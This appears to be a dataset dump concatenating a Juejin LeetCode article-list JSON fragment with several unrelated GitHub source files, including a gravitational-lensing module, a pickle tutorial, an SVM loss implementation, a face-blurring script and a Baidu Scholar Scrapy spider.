9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 6987217727769280519, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6971696625462984711", "article_info": {"article_id": "6971696625462984711", "user_id": "2559318802828711", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/db6e9c9f6dab4cfe9e4318fa830ccd60~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "HOT100——括号生成(JS实现)", "brief_content": "题目描述 解题思路 本题采用DFS的思想。 只要有左括号剩余的时候,就将左括号剩余数量-1,然后继续投入DFS。 当左括号的长度小于有括号的长度时,将右括号剩余数量-1,然后继续投入DFS。 实现代码", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1623224786", "mtime": "1623305940", "rtime": "1623305940", "draft_id": "6971680263206076452", "view_count": 245, "collect_count": 0, "digg_count": 3, "comment_count": 0, "hot_index": 15, "is_hot": 0, "rank_index": 0.0006289, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2559318802828711", "user_name": "Always_positive", "company": "西安电子科技大学", "job_title": "终身学习者", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/517e82e4420199f579614e9a85b16cf6~300x300.image", "level": 3, "description": "自律、学习", "followee_count": 111, "follower_count": 466, "post_article_count": 521, "digg_article_count": 733, "got_digg_count": 1325, "got_view_count": 53315, "post_shortmsg_count": 17, "digg_shortmsg_count": 24, "isfollowed": false, "favorable_author": 0, "power": 1859, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88827, "concern_user_count": 527704}], "user_interact": {"id": 6971696625462984711, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6994821895350648863", "article_info": {"article_id": "6994821895350648863", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 51 N-Queens (Tag:Array Difficulty:Hard)", "brief_content": "这是我参与8月更文挑战的第10天,活动详情查看:8月更文挑战 前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。", "is_english": 0, "is_original": 1, "user_index": 1.915155642176354, "original_type": 0, "original_author": "", "content": "", "ctime": "1628608957", "mtime": "1628656839", "rtime": "1628656839", "draft_id": "6994808610542845960", "view_count": 45, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 2, "is_hot": 0, "rank_index": 0.00062269, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6994821895350648863, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6941172390973931557", "article_info": {"article_id": "6941172390973931557", "user_id": "3711585972125896", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "leetcode : 3无重复字符最长子串(中等)", "brief_content": "给定一个字符串,请你找出其中不含有重复字符的 最长子串 的长度。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1616117653", "mtime": "1616135281", "rtime": "1616135281", "draft_id": "6941147270951731237", "view_count": 233, "collect_count": 1, "digg_count": 21, "comment_count": 1, "hot_index": 33, "is_hot": 0, "rank_index": 0.00062004, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3711585972125896", "user_name": "YU_yu", "company": "东华理工菜鸟公司", "job_title": "大三学生", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/1dbe84270742d689fb5cf84549fb4145~300x300.image", "level": 2, "description": "前端划水小菜鸡", "followee_count": 13, "follower_count": 23, "post_article_count": 8, "digg_article_count": 63, "got_digg_count": 175, "got_view_count": 4473, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 219, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6941172390973931557, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6999988010993319949", "article_info": {"article_id": "6999988010993319949", "user_id": "3025489497950094", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/256c911e6f4e4415afdbbe078d3e5c5b~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「前端刷题」23. 合并K个升序链表", "brief_content": "给你一个链表数组,每个链表都已经按升序排列。 请你将所有链表合并到一个升序链表中,返回合并后的链表。 示例 1: 输入: lis", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629811803", "mtime": "1629860490", "rtime": "1629860490", "draft_id": "6999986695672184839", "view_count": 42, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 2, "is_hot": 0, "rank_index": 0.00061825, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3025489497950094", "user_name": "明无生", "company": "武林", "job_title": "侠客", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/2d4deb94951dc1809fbb962839fc092f~300x300.image", "level": 1, "description": "无怨无悔我走我路,走不尽天涯路。", "followee_count": 0, "follower_count": 0, "post_article_count": 31, "digg_article_count": 2, "got_digg_count": 12, "got_view_count": 1807, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 30, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6999988010993319949, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}], "cursor": "eyJ2IjoiNzAwNzYyNzUzMTk4MTQyMjYyOCIsImkiOjI0MH0=", "count": 552, "has_more": true} | [
"www.1759633997@qq.com"
] | www.1759633997@qq.com |
952babd550cd9afcf85f784233a0982659630df6 | fed5cff094e3bb65b7963c26f96420469f6a60ac | /lensing.py | b9163dcb909a4e8cc116c5654ade26d019a7a5a0 | [] | no_license | sriniraghunathan/cmb_lensing | fbafbd939123345a77c17a51c3d4edd950b046a2 | 8a6250a910ea2687d99646d9ce6d242389d9f6eb | refs/heads/master | 2023-03-29T05:35:13.225785 | 2021-03-24T14:16:37 | 2021-03-24T14:16:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,567 | py | # importing relevant modules
import numpy as np
import scipy as sp
from cosmo import CosmoCalc
import tools
#################################################################################################################################
# defining relevant constants
c = 3e8 # speed of light in m/s
G = 4.3*10**(-9) # gravitational constant in Mpc*M_sun^-1*(km/s)^2
#################################################################################################################################
def lensing_distances(zl, zs):
Dl = CosmoCalc().angular_diameter_distance(0, zl)
Ds = CosmoCalc().angular_diameter_distance(0, zs)
Dls = CosmoCalc().angular_diameter_distance(zl, zs)
return Dl, Ds, Dls # in Mp
def critical_surface_mass_density(zl, zs):
Dl, Ds, Dls = lensing_distances(zl, zs)
sigma_c = (((c*1e-3)**2)/(4*np.pi*G))*((Ds)/(Dl*Dls))
return sigma_c # in M_sun/Mpc^2
def deflection_from_convergence(mapparams, kappa_map):
# defining underlying grid in harmonic space
grid, _ = tools.make_grid(mapparams, harmonic = True)
lX, lY = grid
l2d = np.hypot(lX, lY)
# computing deflection angle from convergence map
kappa_map_fft = np.fft.fft2(kappa_map)
alphaX_fft = 1j * lX * 2. * kappa_map_fft / l2d**2
alphaY_fft = 1j * lY * 2. * kappa_map_fft / l2d**2
alphaX_fft[np.isnan(alphaX_fft)] = 0
alphaY_fft[np.isnan(alphaY_fft)] = 0
alphaX = np.degrees(np.fft.ifft2(alphaX_fft).real)*60
alphaY = np.degrees(np.fft.ifft2(alphaY_fft).real)*60
alpha_vec = [alphaX, alphaY]
return alpha_vec # in arcmin
def lens_map(map_params, unlensed_map, alpha_vec):
# creating undeflected field
grid, _ = tools.make_grid(map_params)
betaX, betaY = grid
# cromputing deflected field
alphaX, alphaY = alpha_vec
thetaX = betaX + alphaX
thetaY = betaY + alphaY
# computing lensed map through interpolation
interpolate = sp.interpolate.RectBivariateSpline(betaY[:,0], betaX[0,:], unlensed_map, kx = 5, ky = 5)
lensed_map = interpolate.ev(thetaY.flatten(), thetaX.flatten()).reshape([len(betaY), len(betaX)])
return lensed_map
#################################################################################################################################
class NFW:
def __init__(self, M_200, c_200, z_l, z_s):
self.M_200 = M_200
self.c_200 = c_200
self.z_l = z_l
self.z_s = z_s
def convergence_profile(self, theta):
# computing cosmological parameters
Dl, _, _ = lensing_distances(self.z_l, self.z_s)
rho_c = CosmoCalc().critical_density(self.z_l)
# computing nfw parameters
r_200 = ((3*self.M_200)/(4*np.pi*200*rho_c))**(1/3)
r_s = r_200/self.c_200
rho_s = (200 / 3) * rho_c * (self.c_200 ** 3 / (np.log(1 + self.c_200) - (self.c_200 / (1 + self.c_200))))
# computing x
theta_rad = np.radians(theta/60)
theta_s = r_s/Dl
x = theta_rad/theta_s
# computing kappa_s
sigma_c = critical_surface_mass_density(self.z_l, self.z_s)
kappa_s = rho_s*r_s/sigma_c
# computing f
x1 = np.where(x > 1)
x2 = np.where(x == 1)
x3 = np.where(x < 1)
f = np.zeros(len(x))
f[x1] = (1/np.sqrt(x[x1]**2-1))*np.arctan(np.sqrt(x[x1]**2-1))
f[x2] = 1
f[x3] = (1/np.sqrt(1-x[x3]**2))*np.arctanh(np.sqrt(1-x[x3]**2))
# computing kappa
kappa_profile = (2*kappa_s*(1-f)/(x**2-1))
return kappa_profile
def convergence_map(self, map_params, centroid_shift = None):
# getting kappa_profile
nx, dx, _, _ = map_params
theta = np.linspace(0, nx*dx/2, nx)
kappa_profile = self.convergence_profile(theta)
# creating map grid
grid, _ = tools.make_grid(map_params)
# adding Gaussian positional uncertainties
gridX, gridY = grid
if centroid_shift is not None:
x_shift, y_shift = centroid_shift
gridX += x_shift
gridY += y_shift
grid = gridX, gridY
# computing convergence map from convergence profile
kappa_map = tools.convert_to_2d(grid, theta, kappa_profile)
return kappa_map | [
"noreply@github.com"
] | noreply@github.com |
c03a0a16cd18a1dc84fbaa0069aa6edc636399b0 | 1f6c1b65ac3f71ccc16b46585595406dfbbc1ca1 | /shared/clock.py | 25626ea5176e1d9b9fc34c3ca7369b6891eb6efa | [] | no_license | luisoibarra/distscrappy | 20d236786c7009e2db1db758e91dac62dd49a963 | ba2db15543f9811f7985b9d77178019308fb3807 | refs/heads/master | 2023-05-31T20:08:07.841953 | 2021-06-22T02:43:41 | 2021-06-22T02:43:41 | 375,577,901 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | import time
import Pyro4
@Pyro4.expose
class ClockMixin:
"""
Mixin that provides clock time methods
"""
def initClockTime(self):
self._clock_time_diff = 0
def setClockTime(self, t : float):
if not hasattr(self, "__clock_time_diff"):
self.initClockTime()
self._clock_time_diff = t - time.time()
def getClockTime(self):
if not hasattr(self, "__clock_time_diff"):
self.initClockTime()
return self._clock_time_diff + time.time()
| [
"lukedalmau@gmail.com"
] | lukedalmau@gmail.com |
dca9033b946ba0da1b82f6962d81894435c4265a | 33ca1dab3b0d4e25bdf114e0b873fcb0fdcbc01e | /Input_Output/Using_Pickel_read_write_bin/__init__.py | 8b8e57d9d58a5d7c511f17e61f5c12d8fcb6ba9a | [] | no_license | Biddy79/eclipse_python | 4f49fd714cbdb09be014e75b74a983e456a94b93 | b90c491834d0a584bcab0b99bb8f26d9c0d26669 | refs/heads/master | 2021-12-08T21:55:44.438923 | 2021-11-01T14:39:18 | 2021-11-01T14:39:18 | 235,864,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,556 | py | #import pickle lib
import pickle
#creating a tuple to write to bin_file
computer = ('CPU RAM HARD DRIVE MOTHERBOARD',
(('cpu', 'AMD Ryzen 9'), ('ram', 'Corsair 32gb'),
('hard drive', 'Samsung 1td ssd'), ('motherboard', 'ASUS ROG STRIX')))
computer_parts, computer_spec = computer
#using pickle.dump() to save computer tuple as a bin file
# with open("computer.bin", 'wb') as pickle_file:
# #parameter tuple file variable
# pickle.dump(computer, pickle_file)
####code above commented out as file as now been created so no need to create again############
#using pickle.load() to read computer.bin in readable format #parameters file variable
with open("computer.bin", 'rb') as computer_pickled:
computer = pickle.load(computer_pickled)
#print(computer)
#unpacking computer tuple that as now been read using pickle.load()
computer_description, computer_parts = computer
#printing out unpacked tuple
print(computer_description)
for parts in computer_parts:
description, part = parts
print(description, part)
print("-" * 30)
#variables created to add to computer.bin file
stock_left = [12, "Manchester", 10, "Sheffield", 2, "Newcastle"]
#using dump to now add stock_left list to computer.bin
#pickled.dump() parameters: item to be saved, file name, and protocol
with open("computer.bin", 'wb') as pickle_file:
pickle.dump(computer, pickle_file)
pickle.dump(stock_left, pickle_file)
#we can also just add a variable here
total_stock = stock_left[0] + stock_left[2] + stock_left[4]
pickle.dump(total_stock, pickle_file)
#now reading computer.bin after dump of new items
#when reading items must be loaded in same order they where dump() into file
with open("computer.bin", 'rb') as computer_pickled:
computer = pickle.load(computer_pickled)
stock_and_area = pickle.load(computer_pickled)
total_stock = pickle.load(computer_pickled)
#unpacking tuple
computer_description, computer_parts = computer
#printing out tuple
print(computer_description)
for parts in computer_parts:
description, part = parts
print(description, part)
#printing out new item stock_left that was added with dump() on line 46
print(stock_and_area)
#printing out new variable that was added on lines 48 and 49
print(total_stock)
#note protocols are not backwards compatible and there are safety concerns when loading pickled files
#from unknown source as this could have system commands with in
| [
"a.beardsley79@gmail.com"
] | a.beardsley79@gmail.com |
c062491db89b6d205ed3010f8b3bee07231d1981 | 9c00aca19e4faea5067769c06f4430b41b8ad00d | /assignment1/cs231n/classifiers/linear_svm.py | e33b1903347f6ba255a8bf29f0f0b4e1e9fb2e41 | [] | no_license | amir-raffiee/cs-231n | 5a2e40ba9ea31cc76e352fe6e70c0e031f9555f6 | 3a80042ddfa5e05e5ba168841d77cf7a1fe29d1c | refs/heads/master | 2021-09-01T16:53:52.507865 | 2017-12-28T01:04:52 | 2017-12-28T01:04:52 | 115,569,727 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,390 | py | import numpy as np
from random import shuffle
from past.builtins import xrange
def svm_loss_naive(W, X, y, reg):
"""
Structured SVM loss function, naive implementation (with loops).
Inputs have dimension D, there are C classes, and we operate on minibatches
of N examples.
Inputs:
- W: A numpy array of shape (D, C) containing weights.
- X: A numpy array of shape (N, D) containing a minibatch of data.
- y: A numpy array of shape (N,) containing training labels; y[i] = c means
that X[i] has label c, where 0 <= c < C.
- reg: (float) regularization strength
Returns a tuple of:
- loss as single float
- gradient with respect to weights W; an array of same shape as W
"""
dW = np.zeros(W.shape) # initialize the gradient as zero
# compute the loss and the gradient
num_classes = W.shape[1]
num_train = X.shape[0]
loss = 0.0
for i in xrange(num_train):
scores = X[i].dot(W)
correct_class_score = scores[y[i]]
for j in xrange(num_classes):
if j == y[i]:
continue
margin = scores[j] - correct_class_score + 1 # note delta = 1
if margin > 0:
loss += margin
dW[:,j]+=np.transpose(X[i])
dW[:,y[i]]-=np.transpose(X[i])
# Right now the loss is a sum over all training examples, but we want it
# to be an average instead so we divide by num_train.
loss /= num_train
dW/=num_train
# Add regularization to the loss.
loss += reg * np.sum(W * W)
dW+=2.*reg*W
#############################################################################
# TODO: #
# Compute the gradient of the loss function and store it dW. #
# Rather that first computing the loss and then computing the derivative, #
# it may be simpler to compute the derivative at the same time that the #
# loss is being computed. As a result you may need to modify some of the #
# code above to compute the gradient. #
#############################################################################
return loss, dW
def svm_loss_vectorized(W, X, y, reg):
"""
Structured SVM loss function, vectorized implementation.
Inputs and outputs are the same as svm_loss_naive.
"""
loss = 0.0
dW = np.zeros(W.shape) # initialize the gradient as zero
#############################################################################
# TODO: #
# Implement a vectorized version of the structured SVM loss, storing the #
# result in loss. #
#############################################################################
scores=X.dot(W)
correct_class_score=scores[np.arange(X.shape[0]),y]
scores-=correct_class_score.reshape(-1,1)
Bool=scores+1.>0.
loss=np.sum(np.sum(np.maximum(0.,scores+1.),axis=1))-X.shape[0]
loss/=X.shape[0]
loss+=reg*np.sum(W*W)
#############################################################################
# END OF YOUR CODE #
#############################################################################
#############################################################################
# TODO: #
# Implement a vectorized version of the gradient for the structured SVM #
# loss, storing the result in dW. #
# #
# Hint: Instead of computing the gradient from scratch, it may be easier #
# to reuse some of the intermediate values that you used to compute the #
# loss. #
#############################################################################
Bool=Bool*np.ones(Bool.shape)
Bool[np.arange(X.shape[0]),y]=-(np.sum(Bool,axis=1)-1.)
dW=np.transpose(X).dot(Bool)
dW/=X.shape[0]
dW+=2.*reg*W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
| [
"noreply@github.com"
] | noreply@github.com |
f879b55baf04f46a20421bff6c616a80bc6116d5 | 0e4c5acb80ea44bfa33a0afb713c0d4bc3a5c8f7 | /xueshu/spiders/xueshu.bak | 7437bcaea15ac5f8c894e8b670a53f200f9a237a | [] | no_license | ljjwyn/xueshu | f9ee58602de25244e85f32948020a511c91b4b86 | 69ccc98b1d4fcef2275a8cef939034f2a3d1e5a8 | refs/heads/master | 2023-01-31T02:53:25.515136 | 2020-12-18T05:40:13 | 2020-12-18T05:40:13 | 322,499,259 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,532 | bak | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from scrapy.spiders import CrawlSpider, Rule
from scrapy_splash import SplashRequest
from scrapy.linkextractors import LinkExtractor
from scrapy_splash import SplashTextResponse, SplashJsonResponse, SplashResponse
from scrapy.http import HtmlResponse
from xueshu.items import XueshuItem
class MySpider(CrawlSpider):
name = 'baiduxueshu'
url = ['http://xueshu.baidu.com/usercenter/paper/show?paperid=5b9f2c599a5a150fbf8e94a72e18edae']
def start_requests(self):
for url in self.url:
# Splash 默认是render.html,返回javascript呈现页面的HTML。
yield SplashRequest(url, args={'wait': 10})
rules = (
Rule(LinkExtractor(restrict_xpaths='//div[@class="con_related"]//li//p[@class="rel_title"]',tags='a',attrs='href'), process_request='splash_request', follow=True),
)
# 这个方法是给Rule 中的process_request用的。
def splash_request(self, request):
"""
process_request is a callable, or a string (in which case a method from the spider object with that name will
be used) which will be called with every request extracted by this rule,
and must return a request or None (to filter out the request).
:param request:
:return: SplashRequest
"""
return SplashRequest(url=request.url, args={'wait': 1})
# 重写CrawlSpider 的方法
def _requests_to_follow(self, response):
"""
splash 返回的类型 有这几种SplashTextResponse, SplashJsonResponse, SplashResponse以及scrapy的默认返回类型HtmlResponse
所以我们这里只需要检测这几种类型即可,相当于扩充了源码的检测类型
:param response:
:return:
"""
# print(type(response)) # <class 'scrapy_splash.response.SplashTextResponse'>
if not isinstance(response, (SplashTextResponse, SplashJsonResponse, SplashResponse, HtmlResponse)):
return
print('==========================动态解析url=========================')
item = XueshuItem()
item['title'] = response.css('.main-info h3 a::text').extract_first()
item['author'] = response.css('.author_text span a::text').extract()
item['abstract'] = response.css('.abstract::text').extract_first()
item['keyWords'] = response.css('.kw_main span a::text').extract()
item['DOI'] = response.css('.doi_wr .kw_main::text').extract_first()
item['cited'] = response.css('.sc_cite_cont::text').extract_first()
yield item
seen = set()
for n, rule in enumerate(self._rules):
links = [lnk for lnk in rule.link_extractor.extract_links(response)
if lnk not in seen]
if links and rule.process_links:
links = rule.process_links(links)
for link in links:
seen.add(link)
r = self._build_request(n, link)
yield rule.process_request(r)
def _build_request(self, rule, link):
# 重要!!!!!这里重写父类方法,特别注意,需要传递meta={'rule': rule, 'link_text': link.text}
# 详细可以查看 CrawlSpider 的源码
r = SplashRequest(url=link.url, callback=self._response_downloaded, meta={'rule': rule, 'link_text': link.text},
args={'wait': 5, 'url': link.url, 'lua_source': ''})
r.meta.update(rule=rule, link_text=link.text)
return r
| [
"15964969802@163.com"
] | 15964969802@163.com |
d02b3ee42165fc8a4ec861da700bab61c57b5750 | 0d448a977b0e30b4d5dac76c8f273efb069e263c | /face_blur/face_bluring.py | 0d8da9adf20cad98adfb541936fc19ba2b9ec2f7 | [] | no_license | Prakadeeswaran05/Mini-Projects | cccecc5f559e4315b2d81ad83e67b44f9f12e733 | 984050cea9b8526e8dd38d76f695dca1503ecb3f | refs/heads/master | 2023-06-05T13:03:12.131637 | 2021-06-19T08:58:44 | 2021-06-19T08:58:44 | 298,242,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 628 | py | import cv2
face_cascade=cv2.CascadeClassifier('C:\\Users\\kesav\\Downloads\\face_blur\\haarcascade_frontalface_default.xml')
cap=cv2.VideoCapture(0)
while True:
ret,frame=cap.read(0)
face_img=frame.copy()
face_rects=face_cascade.detectMultiScale(face_img)
for (x,y,w,h) in face_rects:
img=face_img[y:y+h, x:x+w]
img= cv2.GaussianBlur(img, (51,51), 0)
face_img[y:y+h,x:x+w]=img
cv2.imshow('blurred face',face_img)
#cv2.imshow('blur',img)
k=cv2.waitKey(1)
if k==27:
break
cap.release()
cv2.destroyAllWindows()
| [
"prakugenius@gmail.com"
] | prakugenius@gmail.com |
893ef9476b1476a4529208a0c1475e6749d452e7 | 6d1728bf105a7d6481d0bbca2b88f4478e0632d9 | /beautifulsoup/start/sibling.py | e0e1b3167becdb2101cb9e5f656394b366a1fa76 | [] | no_license | Phantomn/Python | 00c63aceb2d4aa0db71fe5e33fe8b5159b41aadd | 12808adf4b52c60cfe94befb6daa1e8187224beb | refs/heads/Python | 2022-11-09T16:49:49.165884 | 2019-08-05T07:30:07 | 2019-08-05T07:30:07 | 44,149,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | from urllib import urlopen
from bs4 import BeautifulSoup
html = urlopen("http://www.pythonscraping.com/pages/page3.html")
bsObj = BeautifulSoup(html, "html.parser")
for sibling in bsObj.find("table", {"id":"giftList"}).tr.next_siblings:
print(sibling) | [
"tmdvyr123@naver.com"
] | tmdvyr123@naver.com |
52e390b76a17c761f1aefd5adfe00b9b3859f38b | c730ce0eeea6d774ac6bf7b8ae28d7201efbaa12 | /MovieRaterApi/movierater/urls.py | 98444c67e42b240cef788dec464c2ea0739c7263 | [] | no_license | Yi-Lai-SJSU/Django-React-project-Movie-rator | 4057a81550e34e1f72f62eb18e13542c97f7e969 | d9b97c74948f8ccc47b1eb0e924ba1147da34174 | refs/heads/master | 2020-12-13T10:24:33.137183 | 2020-01-18T07:00:26 | 2020-01-18T07:00:26 | 234,388,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | """movierater URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
